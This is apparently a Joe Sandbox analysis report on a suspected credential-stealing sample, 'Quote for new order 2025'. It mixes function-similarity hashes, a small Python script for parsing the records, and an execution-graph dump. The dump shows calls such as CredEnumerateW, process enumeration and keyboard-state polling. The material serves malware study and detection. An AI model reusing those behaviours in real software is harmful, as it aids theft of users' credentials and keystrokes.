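• Opcode ID: 9a06f6f7e0cb3c84155e68f8e000a6720192bbfa6bd2a2690a030722f88cdca2
• Instruction ID: 00d539eadfded16d0e33fd25b301a347cc46f2745acce0f86d2b503a54476f47
• Opcode Fuzzy Hash: 9a06f6f7e0cb3c84155e68f8e000a6720192bbfa6bd2a2690a030722f88cdca2
• Instruction Fuzzy Hash: 5B21F779904200DFDB06DF98D9C4B1BBF65FB88320F20C56EEA054A366C336D416CBA2
"""


def _new_record(apis):
    return {"apis": apis, "source_file": "", "offset": None, "based_on_pe": None,
            "snapshot_file": "", "api_id": "", "string_id": "", "api_string_id": "",
            "opcode_id": "", "instruction_id": "", "opcode_fuzzy_hash": "",
            "instruction_fuzzy_hash": ""}


def parse_records(text):
    """A record starts at 'Memory Dump Source'; the 'APIs' block printed just
    before it (possibly empty) lists the resolved calls inside that function."""
    records, pending_apis, current, section = [], [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            section, pending_apis = "apis", []
        elif line == "Memory Dump Source":
            if current is not None:
                records.append(current)
            current, pending_apis, section = _new_record(pending_apis), [], "dump"
        elif line in ("Joe Sandbox IDA Plugin", "Similarity"):
            section = line
        elif line.startswith(BULLET):
            body = line[len(BULLET):]
            if section == "apis":
                m = API_CALL.match(body)
                if m:  # (call name, module, address of the call site)
                    pending_apis.append((m["name"], m["module"], int(m["ref"], 16)))
            elif current is not None:
                key, _, value = body.partition(":")
                key, value = key.strip(), value.strip()
                if key == "Source File":
                    m = SOURCE.match(value)
                    if m:
                        current["source_file"] = m["file"]
                        current["offset"] = int(m["offset"], 16)
                        current["based_on_pe"] = m["pe"] == "true"
                else:  # "API ID" -> api_id, "Opcode Fuzzy Hash" -> opcode_fuzzy_hash, ...
                    current[key.lower().replace(" ", "_")] = value
    if current is not None:
        records.append(current)
    return records


def by_region(records):
    """Dump-region base address -> sorted names of the resolved calls seen there."""
    regions = defaultdict(set)
    for r in records:
        regions[r["offset"]].update(name for name, _module, _ref in r["apis"])
    return {offset: sorted(names) for offset, names in regions.items()}


def hash_consistency(records):
    """Records whose Opcode ID differs from their Opcode Fuzzy Hash.  In every
    record of this report the two are identical, so one field suffices as key."""
    return [r for r in records if r["opcode_id"] != r["opcode_fuzzy_hash"]]


def pivot_index(records):
    """Opcode ID -> (region base, API ID), the key to match against other reports."""
    return {r["opcode_id"]: (r["offset"], r["api_id"]) for r in records if r["opcode_id"]}


def unlabelled(records):
    """Functions with neither a resolved call nor an API ID: only their
    opcode/instruction hashes identify them."""
    return [r for r in records if not r["apis"] and not r["api_id"]]


if __name__ == "__main__":
    rows = parse_records(SAMPLE)
    for base, names in sorted(by_region(rows).items()):
        print(f"{base:08X}: {names or '(no resolved calls)'}")
    print(f"{len(unlabelled(rows))} record(s) identified by hash only")
```

The three sample records cover the three shapes that occur in this section: a function with a resolved import call and an API ID, a function with an API ID but no resolved call line (the DispatchMessage records), and a function with neither, which the plugin identifies by opcode and instruction hashes alone. Note that "API ID" is a normalized token rather than the call name (MessagePost for PostMessageW, HandleModule for GetModuleHandleW), so the parser keeps it separate from the resolved calls instead of merging the two.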
Memory Dump Source
• Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2ea8d1e556e23316d5b3f4b650aac6539c6eed48f7fc6c6bcfabece07fc3567
• Instruction ID: e71aeaecb1a472570b5f70a7f6fb8bbb9c8adc47ba53d54d29fe233cdb344da6
• Opcode Fuzzy Hash: c2ea8d1e556e23316d5b3f4b650aac6539c6eed48f7fc6c6bcfabece07fc3567
                                                                                                                                                        • Instruction Fuzzy Hash: 7121D475504244DFDB12DFD8D984B2ABBB5FB84328F24C569EC094F286C37AE446CA62
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 71484bd972349f34ffa625247b72787b747acad1f50650019fc723c4e8c9c75c
                                                                                                                                                        • Instruction ID: b488f1997468ba778c55e9ad5d66961834754ff586a257eeca615409e728208f
                                                                                                                                                        • Opcode Fuzzy Hash: 71484bd972349f34ffa625247b72787b747acad1f50650019fc723c4e8c9c75c
                                                                                                                                                        • Instruction Fuzzy Hash: 8A2105B1544200DFD702DFD8D684B6EFBB5FB84714F24C669D8494F296C33AD406C6A1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b665d0a12648d77961094a8b921558da67b0fcd7d65798a5bcc6d9c17e7d7b22
                                                                                                                                                        • Instruction ID: 12937bfb5f6baee2f0848182d78c4fa4502d3d70632a761dc27fc88d6ee70e66
                                                                                                                                                        • Opcode Fuzzy Hash: b665d0a12648d77961094a8b921558da67b0fcd7d65798a5bcc6d9c17e7d7b22
                                                                                                                                                        • Instruction Fuzzy Hash: EA2192755093808FDB03CFA4D994715BF71FB46214F28C5DAD8498F6A7C33A980ACB62
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                        • Instruction ID: a1c348ec32c11df3f04ecdd2fcb45253dabc9a5b604de169b89b9c06fe5662e0
                                                                                                                                                        • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                        • Instruction Fuzzy Hash: F021907A504240DFDB06CF54D9C4B16BF61FB84324F24C5AADD050A766C336D416CB91
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction ID: 8b6af1ebaf67d1c34b069d8874131f0108db83d17b4e75c791da65900f75396c
                                                                                                                                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction Fuzzy Hash: 8B116075504284DFDB12CF94D5C4B2ABF71FB84328F24C6AADC494B696C33AD44ACB92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction ID: 24c1ed4b46863bdfabcf824138b9ab51cfa52abadf937f649703e47499491167
                                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction Fuzzy Hash: 1411BB75504280DFDB02CF98C5C4B19BFB1FB84224F24C6AAD8494F696C33AD40ACB61
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction ID: c0a04bc116dfdc0ed98df8c49facc82c4346975a1d667f80d81265a0bbd76ed1
                                                                                                                                                        • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction Fuzzy Hash: 8E11A076504680CFDB12CF98D6C475AFFB1FB84614F24C6AAD8494B696C33AD40ACB92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4d2d1318aa44334d6fba0811945788a9e56dc304789d6c98315301b044f722bd
                                                                                                                                                        • Instruction ID: 37d3ed89036720fb0252f5f967ba7ad0cb8e97386ab755425123cf2b0209fb32
                                                                                                                                                        • Opcode Fuzzy Hash: 4d2d1318aa44334d6fba0811945788a9e56dc304789d6c98315301b044f722bd
                                                                                                                                                        • Instruction Fuzzy Hash: 2501F7315083809EE7109A59C984767BFE8EF41320F18C42FEE084F3A6C238D840C672
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b71723c512319e947b7a2baed8e0cc8b7912ad0bfb8fd49ff44534d6b65b5141
                                                                                                                                                        • Instruction ID: 5c61774e69c9539f19d28797b01a8cebd6f6b80a4412ec53b5ef9a4d071a05b3
                                                                                                                                                        • Opcode Fuzzy Hash: b71723c512319e947b7a2baed8e0cc8b7912ad0bfb8fd49ff44534d6b65b5141
                                                                                                                                                        • Instruction Fuzzy Hash: 81F04976600640AF93208F0AC885C23FBFDEBC4670715C55EE94A8B762C631FC42CEA0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: be22d7801615f40609f8e8b8b9c683ae0bf1f0c2159d3b807dd4c6701e8b2eb7
                                                                                                                                                        • Instruction ID: d919ceba5f9f54d345ebd15c1150ce89823742ad4dfccdc090818f9a426524a9
                                                                                                                                                        • Opcode Fuzzy Hash: be22d7801615f40609f8e8b8b9c683ae0bf1f0c2159d3b807dd4c6701e8b2eb7
                                                                                                                                                        • Instruction Fuzzy Hash: 13F062715083849EE7118A1AC8C4B63FFE8EF45624F18C45AEE484F396C3799844CA71
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 29898f795469ca9c984cf67c4673b5ab949e60934bdabcc958f2d2b8c14610ce
                                                                                                                                                        • Instruction ID: 6d060c7f5359476d7151c5ad1f2d40f884e1499ff00f1b99fc5e1de9b2773644
                                                                                                                                                        • Opcode Fuzzy Hash: 29898f795469ca9c984cf67c4673b5ab949e60934bdabcc958f2d2b8c14610ce
                                                                                                                                                        • Instruction Fuzzy Hash: D5F03C75104A80AFD3258F06C984C23BFF9EF89660719848DE8864B362C631FC42CF60
APIs
• GetKeyState.USER32(00000001), ref: 09E5E94D
• GetKeyState.USER32(00000002), ref: 09E5E992
• GetKeyState.USER32(00000004), ref: 09E5E9D7
• GetKeyState.USER32(00000005), ref: 09E5EA1C
• GetKeyState.USER32(00000006), ref: 09E5EA61
Memory Dump Source
• Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
Similarity
• API ID: State
• String ID:
• API String ID: 1649606143-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID: Xbq$$^q
• API String ID: 0-1593437937
                                                                                                                                                        • Opcode ID: 209a7b06c8208d8a93a401d279183056e58d4426ed8c84451243e332d3fadd8a
                                                                                                                                                        • Instruction ID: 9f28bc58aed678a64f3e21d35d3de48977067bdee12475fad072ed1ccd4b9e4a
                                                                                                                                                        • Opcode Fuzzy Hash: 209a7b06c8208d8a93a401d279183056e58d4426ed8c84451243e332d3fadd8a
                                                                                                                                                        • Instruction Fuzzy Hash: 1F81B374B002188FDB19AB79885467E7BB7BFC4740F05852DE817EB388CE358C068791
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: Te^q
                                                                                                                                                        • API String ID: 0-671973202
                                                                                                                                                        • Opcode ID: 3089ab8c77a1bd5a8486bcae3c5b2b7f7f36e471e7ade74ef9864a12afd9dd7a
                                                                                                                                                        • Instruction ID: f2778e4fe587acf830ce80976bd3c17fa8bccd9aa5a28f0999c31608e7236113
                                                                                                                                                        • Opcode Fuzzy Hash: 3089ab8c77a1bd5a8486bcae3c5b2b7f7f36e471e7ade74ef9864a12afd9dd7a
                                                                                                                                                        • Instruction Fuzzy Hash: CF718DB4A0010ADFDB54DF59C480BADFBB2FF89318F16C525E8199B365EB309895CB80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: de31c3706319006d7445ce3d38aea2cc5ba59610fbfa242864e21508c4a53b22
                                                                                                                                                        • Instruction ID: 89a1d7abc3d37ab84686186a255633cbb16d8a9d8d0f09628b308f0ebfe15734
                                                                                                                                                        • Opcode Fuzzy Hash: de31c3706319006d7445ce3d38aea2cc5ba59610fbfa242864e21508c4a53b22
                                                                                                                                                        • Instruction Fuzzy Hash: AB5249B1600706CFD712EF68F88C2997BB1FB42314BA0C21AD5516F2E9D7B4658ACF94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3fcf5b0cd0ee0fc94e0b2d563c978023bf1f167b171a247b42be635e8303e5de
                                                                                                                                                        • Instruction ID: 1393272bd5875a9f1256d71e427696f33a26fef444d40201229799f26e49f7c7
                                                                                                                                                        • Opcode Fuzzy Hash: 3fcf5b0cd0ee0fc94e0b2d563c978023bf1f167b171a247b42be635e8303e5de
                                                                                                                                                        • Instruction Fuzzy Hash: 94A15E32A0031A8FCF05DFB4D89459EBBB6FF85300B15856BE916AF225DB31E945CB80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a5a85bf3e7bb27842127f8b791057c2899ac62318a50d266dcf9325e75ab825b
                                                                                                                                                        • Instruction ID: b6775e9b7591aad08b22de89d2c97c310729a435aff6cb7d86cdc09c51224a28
                                                                                                                                                        • Opcode Fuzzy Hash: a5a85bf3e7bb27842127f8b791057c2899ac62318a50d266dcf9325e75ab825b
                                                                                                                                                        • Instruction Fuzzy Hash: B49160B0E0020ADFDF50DFA9C9957EDBBF6AF88318F148129D405AB354EB74A845CB81

Execution Graph

Execution Coverage: 6.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.5%
Total number of Nodes: 1848
Total number of Limit Nodes: 49
37205->37210 37207 414948 37212 414a31 37207->37212 37214 406cd0 27 API calls 37208->37214 37209->37095 37209->37171 37215 414911 37210->37215 37211 40a22f 2 API calls 37217 4141ab 37211->37217 37216 406cd0 27 API calls 37212->37216 37213 41457c memset 37218 406cd0 27 API calls 37213->37218 37219 41471d 37214->37219 37654 40a157 GetFileAttributesW 37215->37654 37221 414a3d 37216->37221 37222 40a22f 2 API calls 37217->37222 37223 41456b 37218->37223 37224 40a2de 6 API calls 37219->37224 37226 40a2de 6 API calls 37221->37226 37227 4141ba 37222->37227 37223->37196 37223->37213 37228 40a2de 6 API calls 37223->37228 37521 40b3fa 37223->37521 37526 413db6 37223->37526 37535 40b477 37223->37535 37229 414731 37224->37229 37225 414920 37225->37197 37232 41494d memset 37225->37232 37230 414a51 37226->37230 37227->37193 37234 406cd0 27 API calls 37227->37234 37228->37223 37231 413db6 260 API calls 37229->37231 37658 40a157 GetFileAttributesW 37230->37658 37231->37171 37237 406cd0 27 API calls 37232->37237 37238 4141d5 37234->37238 37236->37113 37236->37183 37239 414975 37237->37239 37240 40a2de 6 API calls 37238->37240 37241 40a2de 6 API calls 37239->37241 37242 4141e5 37240->37242 37243 414989 37241->37243 37551 40a157 GetFileAttributesW 37242->37551 37245 40b43e 9 API calls 37243->37245 37254 4149bf 37245->37254 37246 4141f4 37246->37193 37247 409a0c 344 API calls 37246->37247 37247->37193 37248 40b477 9 API calls 37248->37254 37249 414a26 37250 40b4e4 FindClose 37249->37250 37250->37212 37251 40b3fa 2 API calls 37251->37254 37252 406cd0 27 API calls 37252->37254 37253 40a2de 6 API calls 37253->37254 37254->37248 37254->37249 37254->37251 37254->37252 37254->37253 37256 414a04 37254->37256 37656 40a157 GetFileAttributesW 37254->37656 37657 44653e 23 API calls 37256->37657 37258->37047 37259->37050 37260->37047 37261->37042 37263 40cc23 37262->37263 37659 40b7d1 free free 37263->37659 37265 40cc36 37660 40b7d1 free free 37265->37660 37267 40cc3e 37661 40b7d1 free free 
37267->37661 37269 40cc46 37270 40b02a free 37269->37270 37271 40cc4e 37270->37271 37662 40c722 memset 37271->37662 37276 40aed1 9 API calls 37277 40cc71 37276->37277 37278 40aed1 9 API calls 37277->37278 37279 40cc7e 37278->37279 37691 40c871 37279->37691 37283 40cd25 37292 40b8ec 37283->37292 37284 40cd1a 37733 40521a 39 API calls 37284->37733 37290 40cc93 37290->37283 37290->37284 37291 40cae2 50 API calls 37290->37291 37716 40acc5 37290->37716 37291->37290 37901 4075c7 37292->37901 37295 40ba99 37921 407670 37295->37921 37297 40b92a 37297->37295 37300 406cd0 27 API calls 37297->37300 37298 40b91b CredEnumerateW 37298->37297 37301 40b93e wcslen 37300->37301 37301->37295 37303 40b95a 37301->37303 37302 40b962 wcsncmp 37302->37303 37303->37295 37303->37302 37306 40b9b9 memset 37303->37306 37307 40b9e3 memcpy 37303->37307 37308 40ba4d wcschr 37303->37308 37309 406cd0 27 API calls 37303->37309 37311 40ba7f LocalFree 37303->37311 37924 40b899 28 API calls 37303->37924 37925 407687 37303->37925 37306->37303 37306->37307 37307->37303 37307->37308 37308->37303 37310 40ba32 _wcsnicmp 37309->37310 37310->37303 37310->37308 37311->37303 37312 41607f 37940 416068 37312->37940 37315 406cd0 27 API calls 37316 416095 37315->37316 37317 40ae2a 8 API calls 37316->37317 37318 41609b 37317->37318 37319 4160a3 37318->37319 37320 4160c6 37318->37320 37322 406c77 27 API calls 37319->37322 37321 416068 FreeLibrary 37320->37321 37323 4160cb 37321->37323 37324 4160ad GetProcAddress 37322->37324 37323->37071 37324->37320 37325 4160d0 37324->37325 37326 4160e0 37325->37326 37327 416068 FreeLibrary 37325->37327 37326->37071 37328 4160ee 37327->37328 37328->37071 37943 4167d1 37329->37943 37331 416a37 37331->37054 37333 4167d1 42 API calls 37334 416963 37333->37334 37335 416a2d 37334->37335 37964 41678a GetVersionExW 37334->37964 37337 4167d1 42 API calls 37335->37337 37337->37331 37338 4169b1 memcmp 37343 4169a4 37338->37343 37339 416a23 37968 41689d 42 API calls 37339->37968 37343->37338 
37343->37339 37965 4168bd 42 API calls 37343->37965 37966 40adc6 GetVersionExW 37343->37966 37967 41689d 42 API calls 37343->37967 37346 412d3e 37345->37346 37969 412db7 37346->37969 37348 412daa 37983 40b7d1 free free 37348->37983 37350 412d44 37350->37348 37354 412d95 37350->37354 37980 40a5eb CreateFileW 37350->37980 37351 412db3 wcsrchr 37351->37069 37354->37348 37355 409f85 2 API calls 37354->37355 37355->37348 37357 416b94 17 API calls 37356->37357 37358 4133e9 37357->37358 37359 416b94 17 API calls 37358->37359 37360 4133f7 37359->37360 37361 40a2de 6 API calls 37360->37361 37362 413414 37361->37362 37363 40a2de 6 API calls 37362->37363 37364 41342f 37363->37364 37365 40a2de 6 API calls 37364->37365 37366 413447 37365->37366 37367 412e96 20 API calls 37366->37367 37368 41345b 37367->37368 37369 412e96 20 API calls 37368->37369 37370 41346c 37369->37370 38010 4134f0 memset 37370->38010 37372 413481 37373 4134e1 37372->37373 37375 41348d memset 37372->37375 37377 409f85 2 API calls 37372->37377 37378 40aed1 9 API calls 37372->37378 38024 40b7d1 free free 37373->38024 37375->37372 37376 4134e9 37376->37158 37377->37372 37378->37372 38037 40aca5 WideCharToMultiByte 37379->38037 37381 409a46 38038 404f45 memset 37381->38038 37384 409a63 memset memset memset memset memset 37385 406cd0 27 API calls 37384->37385 37386 409afb 37385->37386 37387 40a2de 6 API calls 37386->37387 37388 409b0b 37387->37388 37389 406cd0 27 API calls 37388->37389 37390 409b1a 37389->37390 37391 40a2de 6 API calls 37390->37391 37392 409b2a 37391->37392 37393 406cd0 27 API calls 37392->37393 37394 409b39 37393->37394 37395 40a2de 6 API calls 37394->37395 37396 409b49 37395->37396 37397 406cd0 27 API calls 37396->37397 37398 409b58 37397->37398 37399 40a2de 6 API calls 37398->37399 37400 409b68 37399->37400 37401 406cd0 27 API calls 37400->37401 37402 409b77 37401->37402 37403 40a2de 6 API calls 37402->37403 37404 409b87 37403->37404 38057 40a157 GetFileAttributesW 37404->38057 37406 409b98 
37407 409bb2 37406->37407 37408 409b9d 37406->37408 38059 40a157 GetFileAttributesW 37407->38059 38058 40913e 79 API calls 37408->38058 37411 409bad 37411->37158 37412 409bbe 37413 409bc3 37412->37413 37414 409bd5 37412->37414 38060 40948f 204 API calls 37413->38060 38061 40a157 GetFileAttributesW 37414->38061 37417 409be1 37418 409be6 37417->37418 37419 409bfb 37417->37419 38062 4097b9 31 API calls 37418->38062 38063 40a157 GetFileAttributesW 37419->38063 37422 409c07 37423 409c21 37422->37423 37424 409c0c 37422->37424 38065 40a157 GetFileAttributesW 37423->38065 38064 4097b9 31 API calls 37424->38064 37427 409c2d 37427->37411 37428 409c32 37427->37428 38066 4097b9 31 API calls 37428->38066 37431 408d81 free 37430->37431 37432 4157b2 CreateToolhelp32Snapshot memset Process32FirstW 37431->37432 37433 41594d Process32NextW 37432->37433 37434 4157f2 OpenProcess 37433->37434 37435 415964 CloseHandle 37433->37435 37436 415840 memset 37434->37436 37437 4158fd 37434->37437 37435->37170 38071 415974 37436->38071 37437->37433 37439 41590c free 37437->37439 37440 409fb3 3 API calls 37437->37440 37439->37437 37440->37437 37441 415884 GetModuleHandleW 37443 415893 GetProcAddress 37441->37443 37444 41586c 37441->37444 37443->37444 37444->37441 38076 4153a6 37444->38076 38092 4156f1 37444->38092 37446 4158ef CloseHandle 37446->37437 37448 416b94 17 API calls 37447->37448 37449 413258 37448->37449 37450 416b94 17 API calls 37449->37450 37451 413266 37450->37451 37452 40a2de 6 API calls 37451->37452 37453 413283 37452->37453 37454 40a2de 6 API calls 37453->37454 37455 41329e 37454->37455 37456 40a2de 6 API calls 37455->37456 37457 4132b6 37456->37457 37458 412e96 20 API calls 37457->37458 37459 4132ca 37458->37459 37460 412e96 20 API calls 37459->37460 37461 4132db 37460->37461 37462 4134f0 33 API calls 37461->37462 37463 4132f0 37462->37463 37464 413350 37463->37464 37465 4132fc memset 37463->37465 37468 409f85 2 API calls 37463->37468 37469 40aed1 9 API calls 37463->37469 38106 
40b7d1 free free 37464->38106 37465->37463 37467 413358 37467->37098 37468->37463 37469->37463 37471 416b94 17 API calls 37470->37471 37472 4130c7 37471->37472 37473 416b94 17 API calls 37472->37473 37474 4130d5 37473->37474 37475 40a2de 6 API calls 37474->37475 37476 4130f2 37475->37476 37477 40a2de 6 API calls 37476->37477 37478 41310d 37477->37478 37479 40a2de 6 API calls 37478->37479 37480 413125 37479->37480 37481 412e96 20 API calls 37480->37481 37482 413139 37481->37482 37483 412e96 20 API calls 37482->37483 37484 41314a 37483->37484 37485 4134f0 33 API calls 37484->37485 37491 41315f 37485->37491 37486 4131bf 38107 40b7d1 free free 37486->38107 37487 41316b memset 37487->37491 37489 4131c7 37489->37115 37490 409f85 2 API calls 37490->37491 37491->37486 37491->37487 37491->37490 37492 40aed1 9 API calls 37491->37492 37492->37491 37494 416ae7 9 API calls 37493->37494 37495 416ba6 37494->37495 37496 416bd9 memset 37495->37496 38108 40a2a9 37495->38108 37499 416bfa 37496->37499 37498 416bca SHGetSpecialFolderPathW 37502 414508 37498->37502 38111 416466 RegOpenKeyExW 37499->38111 37502->37111 37503 416c27 37504 416c5a wcscpy 37503->37504 38112 416b16 wcscpy 37503->38112 37504->37502 37506 416c38 38113 416480 RegQueryValueExW 37506->38113 37508 416c4f RegCloseKey 37508->37504 37510 40a321 37509->37510 37511 40a302 wcscpy 37509->37511 37510->37151 37512 409cd8 2 API calls 37511->37512 37513 40a310 wcscat 37512->37513 37513->37510 37515 40b4e4 FindClose 37514->37515 37516 40b447 37515->37516 37517 409f85 2 API calls 37516->37517 37518 40b45b 37517->37518 37519 40a2de 6 API calls 37518->37519 37520 40b46f 37519->37520 37520->37223 37522 40b406 37521->37522 37523 40b435 37521->37523 37522->37523 37524 40b40d wcscmp 37522->37524 37523->37223 37524->37523 37525 40b424 wcscmp 37524->37525 37525->37523 37527 40b43e 9 API calls 37526->37527 37533 413df1 37527->37533 37528 40b477 9 API calls 37528->37533 37529 413e20 37531 40b4e4 FindClose 37529->37531 37530 40b3fa 2 API 
